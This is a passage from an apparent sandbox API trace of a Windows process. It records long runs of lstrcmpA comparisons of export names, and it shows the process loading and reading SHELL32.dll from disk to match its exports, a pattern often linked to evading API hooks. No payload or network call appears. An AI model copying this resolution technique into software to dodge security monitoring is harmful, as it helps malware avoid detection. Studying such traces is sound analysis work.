lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0094.992] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0094.993] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0094.993] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0094.993] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0094.993] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0094.993] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0094.994] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0094.994] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0094.994] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0094.994] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0094.994] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.994] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.995] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0094.995] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0094.995] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0094.995] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0094.995] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0094.995] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0095.159] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0095.159] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0095.159] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0095.159] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0095.159] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0095.159] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0095.159] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0095.159] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0095.159] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0095.160] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0095.160] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0095.161] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0095.161] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0095.161] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0095.161] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0095.161] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0095.161] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0095.161] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0095.161] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0095.161] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0100.632] GetProcessHeap () returned 0x430000 [0100.632] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x411e040 | out: hHeap=0x430000) returned 1 [0100.930] GetProcessHeap () returned 0x430000 [0100.931] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449000 [0100.931] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0100.932] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0100.932] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0100.932] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0100.932] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0100.933] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0100.933] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0100.933] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0100.933] GetProcessHeap () returned 0x430000 [0100.933] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1587258) returned 0x4117040 [0101.185] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0101.185] ReadFile (in: hFile=0x140, lpBuffer=0x4117040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4117040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0105.635] CloseHandle (hObject=0x140) returned 1 [0105.635] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0105.636] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0105.636] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0105.636] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0105.636] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0105.636] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0105.636] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0105.636] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0105.636] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.636] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0105.956] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0105.956] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0105.956] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.956] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0105.956] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0105.956] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0105.956] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0105.957] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.957] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0105.957] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.957] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0105.957] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0105.957] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0105.957] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.957] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0105.957] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0105.957] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0105.957] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0105.957] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0105.957] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0105.957] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.957] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0105.957] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.957] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0105.957] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0105.957] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0105.957] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0105.957] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0105.957] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0105.958] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0105.958] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0105.958] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0105.958] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0105.958] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0105.958] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0105.959] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0105.959] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0105.959] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0105.959] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.959] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0105.959] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.959] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0105.959] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0105.959] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0105.959] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0105.959] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0105.959] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0105.959] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0105.959] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0105.959] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0105.959] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0105.959] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0105.959] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0105.959] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0105.959] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0105.959] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0105.959] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0105.959] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0105.959] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0105.960] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") 